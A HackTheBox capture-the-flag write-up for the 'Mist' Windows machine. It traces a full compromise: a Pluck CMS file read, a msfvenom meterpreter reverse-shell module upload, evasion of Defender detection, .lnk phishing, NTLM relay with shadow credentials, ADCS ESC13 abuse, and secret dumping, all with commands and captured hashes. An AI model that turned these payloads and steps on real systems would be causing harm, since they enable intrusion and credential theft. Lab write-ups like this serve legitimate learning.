Mist is an insane-difficulty Windows HackTheBox machine. It starts off with a File Read vulnerability in Pluck version v4.7.18 to leak admin password and get a hold of a system shell by uploading a malicious module. Then there’s a directory with links in it that we can abuse for a phishing attack to pivot to another user. Atfer that, we can find that LDAP signing is off so we could PetitPotam to coerce the server and then add shadow credentials to the machine account on the webserver to access local admin. Later finding a KeePass Database to do a pattern hash cracking and obtain its’ password. Finally, move on from there, read GMSA password, abuse AddKeyCredentialLink and exploit ADCS ESC13.
PS C:\Users\0xkujen> nmap -A-Pn10.129.128.221 Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-2516:41 W. Central Africa Standard Time Nmap scan report for10.129.128.221 Host is up (1.0s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) | http-robots.txt: 2 disallowed entries |_/data/ /docs/ |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-title: Mist - Mist |_Requested resource was http://10.129.128.221/?file=mist |_http-generator: pluck 4.7.18
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in144.01 seconds PS C:\Users\0xkujen>
We can see that we have only one open port which is 80, that has a web application running on it, so let’s check it out.
One interesting thing about this interface is that it says that it’s powered by Pluck CMS and we also have a redirect to a login.php once we click on “admin”: Pluck Login
During my initial recon phase, I used Feroxbuster to check for interesting directories and files and stumbled upon this one: Local File Read
Checking this issue on Github will give us a good idea on how to proceed forward since it is specifying how we can include file and read them with being authenticated: https://github.com/pluck-cms/pluck/issues/122
One really interesting resource I found was /data/settings/modules/albums/admin_backup.php: Local File Read
I tried to read the file by including the whole path but it did not work. However, when I only inserted the name of the file only I got a hit: Local File Read
It looks like a password hash. I used Crackstation to rapidly get a password value and I got a hit for lexypoo97
Pluck v4.7.18 - Remote Code Execution (RCE)
I used that password to login into the Pluck instance we saw earlier and it was successful: Pluck
Looking at the version displayed on the page footer v4.7.18, I searched for any public exploits and stumbled upon this one . The steps are as follows: 1- Create a php/meterpreter_reverse_tcp payload using msfvenom: msfvenom -p php/meterpreter_reverse_tcp -f raw LHOST=10.10.x.x LPORT=4444 -o kujen.php 2- Zip that to kujen.zip 3- upload it by navigating to Options => Manage Modules => Install Module 4- Navigate to http://mist.htb/data/modules/kujen/kujen.php 5- Get a reverse shell session on msfconsole:
1 2 3 4 5 6 7
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.x.x:4444 [*] Meterpreter session 1 opened (10.10.x.x:4444 -> 10.129.128.221:49975) at 2024-10-25 13:33:31 -0400
meterpreter > getuid Server username: svc_web
And we are in!! First step now is to get a new reverse shell using windows/x64/meterpreter/reverse_tcp because the PHP one will not allow us to keep working comfortably, so I’ll just create a new payload and get my reverse shell:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.x.x:4455 [*] Sending stage (201798 bytes) to 10.129.128.221 [*] Meterpreter session 1 opened (10.10.x.x:4455 -> 10.129.128.221:49895) at 2024-10-25 13:42:44 -0400
meterpreter > ls Listing: C:\xampp\htdocs\data\modules\kujen ===========================================
Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100777/rwxrwxrwx 7168 fil 2024-10-25 13:46:44 -0400 kujen.exe 100666/rw-rw-rw- 34849 fil 2024-10-25 13:46:23 -0400 kujen.php
And now we can keep going forward :)
1 2 3 4 5 6 7 8 9 10 11
PS C:\> net view \\MS01 net view \\MS01 Shared resources at \\MS01
Share name Type Used as Comment
------------------------------------------------------------------------------- Common Applications Disk The command completed successfully.
The “Common Applications” folder should not exist since it doesn’t in the initial installation of a windows system. Checking it, I find some interesting “.lnk” files. This article was really helpful for me to abuse a popular phishing technique where attackers embed .lnk files into the Office documents and camouflage them with Ms Word office icons in order to deceive victims to click and run them.
PS: I tried for a long time to upload my “kujen.exe” again, but it got detected each time. Therefore I searched for a whitelisted folder that would not trigger the detection (which is something everyone should do) and the /files folder made sense to me since it’s a file directory and detections would be less on it. And that was actuall the case for me :) We could also search for defender exclusions, this article explains it well.
And we got our reverse shell for the “MIST\Brandon.Keywarp” user:
1 2 3 4 5 6 7 8 9
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.x.x:4455 [*] Sending stage (201798 bytes) to 10.129.128.221 [*] Meterpreter session 2 opened (10.10.x.x:4455 -> 10.129.128.221:49983) at 2024-10-25 14:24:49 -0400
meterpreter > getuid Server username: MIST\Brandon.Keywarp
Certificate service to obtain MIST\brandon.keywrap NTLM hash:
We will requesting a user certificate from the CA “mist-DC01-CA” on the server “DC01”:
I’ll now run the command openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx on my machine since openssl is not installed on the victim machine and I’ll be getting a cert.pfx file.
Then, I’ll be requesting a TGT for the user brandon.keywarp using the provided certificate file:
Now that we confirm that we have a domain user, we can force access, this was a really helpful article and it was actually the piece I was missing when I first solved the machine. So first, I’ll have to enable WebDav client:
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF]
[+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF]
[+] Generic Options: Responder NIC [tun0] Responder IP [10.10.x.x] Responder IPv6 [dead:beef:4::1005] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] [+] Current Session Variables: Responder Machine Name [WIN-4VFBEQUM2XP] Responder Domain Name [QIJ9.LOCAL] Responder DCE-RPC Port [47421] [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.129.128.221 [SMB] NTLMv2-SSP Username : MIST\MS01$ [SMB] NTLMv2-SSP Hash : MS01$::MIST:b7d9b4286a477169:8D35B82B5E42AA5DC34CFBDAC828BADA:01010000000000000044489DFA26DB012DBA172017E8D32D0000000002000800510049004A00390001001E00570049004E002D0034005600460042004500510055004D0032005800500004003400570049004E002D0034005600460042004500510055004D003200580050002E00510049004A0039002E004C004F00430041004C0003001400510049004A0039002E004C004F00430041004C0005001400510049004A0039002E004C004F00430041004C00070008000044489DFA26DB01060004000200000008003000300000000000000000000000004000006D4270F1B6F11653A80041CB7179F07AF54BC5E8DCEF75AB9D15C78A9F899C870A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000
And we get a hit! So now let’s use ntlmrelayx script from Impacket to get the LDAP shell, clear the shadow credentials and later add the new one (we can do that using this specific pull request https://github.com/fortra/impacket/pull/1402 ):
[*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] HTTPD(80): Connection from 10.129.166.107 controlled, attacking target ldaps://192.168.100.100 [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:636 ... OK [*] HTTPD(80): Authenticating against ldaps://192.168.100.100 as MIST/MS01$ SUCCEED [*] Started interactive Ldap shell via TCP on 127.0.0.1:11000 [+] No more targets [*] HTTPD(80): Connection from 10.129.166.107 controlled, but there are no more targets left!
One really important thing is do not forget to keep running .\DavRelayUp.exe relay -l http://*:5357/ --ComputerName ms01$ -f -m shadowcred --domain mist.htb.
┌──(kali㉿kali)-[~] └─$ nc 127.0.0.1 11000 Type helpfor list of commands
# clear_shadow_creds MS01$ Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
Shadow credentials cleared successfully!
# set_shadow_creds MS01$ Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
KeyCredential generated with DeviceID: a7a6bf2a-0197-0a69-a2f0-69702c52ccef Shadow credentials successfully added! Saved PFX (#PKCS12) certificate & key at path: 9xpGRCU8.pfx Must be used with password: 2zFj7mulRkxeaECxp6n5
#
Pass the Certificate
I’ll now remove password protection from the 9xpGRCU8.pfx certificate and saves it as unprotected.pfx.
1 2 3 4 5 6 7
┌──(kali㉿kali)-[~/impacket] └─$ certipy-ad cert -export -pfx 9xpGRCU8.pfx -password 2zFj7mulRkxeaECxp6n5 -out unrpotected.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'unrpotected.pfx'
And now uthenticate to the mist.htb domain as MS01$ using the unprotected.pfx certificate acquiring its’ hash:
[!] Could not find identification in the provided certificate [*] Using principal: ms01$@mist.htb [*] Trying to get TGT... [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK [*] Got TGT [*] Saved credential cache to 'ms01.ccache' [*] Trying to retrieve NT hashfor'ms01$' [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:57e09da59439ab2d04c15e9250237f48
Now I’ll request a TGT for the ms01$ account using an RC4 hash for authentication:
[*] Building S4U2self request for: '[email protected]' [*] Using domain controller: DC01.mist.htb (192.168.100.100) [*] Sending S4U2self request to 192.168.100.100:88 [+] S4U2self success! [*] Substituting alternative service name 'cifs/ms01.mist.htb' [*] Got a TGS for'Administrator' to '[email protected]' [*] base64(ticket.kirbi):
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.12.0-py3.11.egg/impacket [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.101:445 ... OK [+] Using Kerberos Cache: ms01.ccache [+] Domain retrieved from CCache: MIST.HTB [+] Returning cached credential for CIFS/[email protected] [+] Using TGS from cache [*] SMBv3.0 dialect used [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.101:135 ... OK [+] Using Kerberos Cache: ms01.ccache [+] Domain retrieved from CCache: MIST.HTB [+] SPN HOST/[email protected] not found in cache [+] AnySPN is True, looking for another suitable SPN [+] Returning cached credential for CIFS/[email protected] [+] Using TGS from cache [+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best [+] Target system is ms01.mist.htb and isFQDN is True [+] StringBinding: \\\\MS01[\\PIPE\\atsvc] [+] StringBinding: \\\\MS01[\\pipe\\SessEnvPublicRpc] [+] StringBinding: MS01[49669] [+] StringBinding chosen: ncacn_ip_tcp:ms01.mist.htb[49669] [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.101:49669 ... OK [+] Using Kerberos Cache: ms01.ccache [+] Domain retrieved from CCache: MIST.HTB [+] SPN HOST/[email protected] not found in cache [+] AnySPN is True, looking for another suitable SPN [+] Returning cached credential for CIFS/[email protected] [+] Using TGS from cache [+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best [+] Using Kerberos Cache: ms01.ccache [+] Domain retrieved from CCache: MIST.HTB [+] SPN HOST/[email protected] not found in cache [+] AnySPN is True, looking for another suitable SPN [+] Returning cached credential for CIFS/[email protected] [+] Using TGS from cache [+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best [+] Using Kerberos Cache: ms01.ccache [+] Domain retrieved from CCache: MIST.HTB [+] SPN HOST/[email protected] not found in cache [+] AnySPN is True, looking for another suitable SPN [+] Returning cached credential for CIFS/[email protected] [+] Using TGS from cache [+] Changing sname from cifs/[email protected] to HOST/[email protected] and hoping for the best [!] Launching semi-interactive shell - Careful what you execute [!] Press helpfor extra shell commands C:\>whoami mist\administrator C:\>cdusers C:\users>cd administrator C:\users\administrator>cd desktop C:\users\administrator\desktop>dir Volume in drive C has no label. Volume Serial Number is 560D-8100
Directory of C:\users\administrator\desktop
02/21/2024 08:39 AM <DIR> . 09/10/2024 03:45 AM <DIR> .. 09/10/2024 03:46 AM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 11,852,722,176 bytes free
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework
The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework
┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker] └─$ proxychains4 python3 pywhisker.py -d "mist.htb" --dc-ip 192.168.100.100 -u 'svc_ca$' -H 542fb8bb34abc7460eb6800cd6399e54 --target "svc_cabackup" --action "add" [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:389 ... OK [*] Searching for the target account [*] Target user found: CN=svc_cabackup,CN=Users,DC=mist,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: bee71310-6810-c2f6-3b94-bacc4aea3e57 [*] Updating the msDS-KeyCredentialLink attribute of svc_cabackup [+] Updated the msDS-KeyCredentialLink attribute of the target object [+] Saved PFX (#PKCS12) certificate & key at path: f43g4m4m.pfx [*] Must be used with password: 53qemuN1Tq4ze0kn1i8F [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker] └─$ certipy-ad cert -export -pfx f43g4m4m.pfx -password "53qemuN1Tq4ze0kn1i8F" -out unrpotected.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'unrpotected.pfx' ┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker] └─$ proxychains certipy auth -pfx unprotected.pfx -domain mist.htb -username SVC_CABACKUP -dc-ip 192.168.100.100 -ns 192.168.100.100 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 proxychains: can't load process 'certipy'. (hint: it's probably a typo): No such file or directory ┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker] └─$ proxychains certipy-ad auth -pfx unprotected.pfx -domain mist.htb -username SVC_CABACKUP -dc-ip 192.168.100.100 -ns 192.168.100.100 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: [Errno 2] No such file or directory: 'unprotected.pfx' [-] Use -debug to print a stacktrace ┌──(kali㉿kali)-[~/hackthebox/mist/pywhisker] └─$ proxychains certipy-ad auth -pfx unrpotected.pfx -domain mist.htb -username SVC_CABACKUP -dc-ip 192.168.100.100 -ns 192.168.100.100 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate [*] Using principal: [email protected] [*] Trying to get TGT... [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK [*] Got TGT [*] Saved credential cache to 'svc_cabackup.ccache' [*] Trying to retrieve NT hashfor'svc_cabackup' [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:53 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:53 ... OK [*] Requesting certificate via RPC [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:445 ... OK [*] Successfully requested certificate [*] Request ID is 62 [*] Got certificate with UPN '[email protected]' [*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135' [*] Saved certificate and private key to 'svc_cabackup.pfx' ┌──(kali㉿kali)-[~/hackthebox/mist] └─$ proxychains certipy-ad auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected] [*] Trying to get TGT... [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK [*] Got TGT [*] Saved credential cache to 'svc_cabackup.ccache' [*] Trying to retrieve NT hashfor'svc_cabackup' [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:88 ... OK [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
ESC13 Abuse
When the certificate we apply for have OID group, we can obtain the permissions from this group. So as long as all certificates and OIDs are enumerated, we can find a path: https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1 is a good resource for this enumeration.
I will now request a certificate for the svc_cabackup service account using certipy-ad, successfully obtaining a certificate and its private key saved as svc_cabackup.pfx. After authenticating with this certificate, we’ll retrieve the NT hash for the service account and save the Kerberos credential cache for later use. Finally, extract the SAM registry hive from the target domain controller to dump secrets with it :) .
I’ll now run impacket-secretsdump to extract SAM hashes, as well as cached domain logon information and LSA secrets from the saved registry files. I successfully retrieved the hashe for the Administrator and including machine account credentials.
Now we can go on the machine an claim our root flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(kali㉿kali)-[~/hackthebox/mist] └─$ proxychains4 evil-winrm -u administrator -H 'b46782b9365344abdff1a925601e0385' -i 192.168.100.100 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.100:5985 ... OK *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt 2d158e0a76edbd****************** *Evil-WinRM* PS C:\Users\Administrator\desktop>
That was it for this writeup. And I can say that this was the hardest machine I have ever played on HackTheBox. Was really fun and I learned a lot. -0xkujen
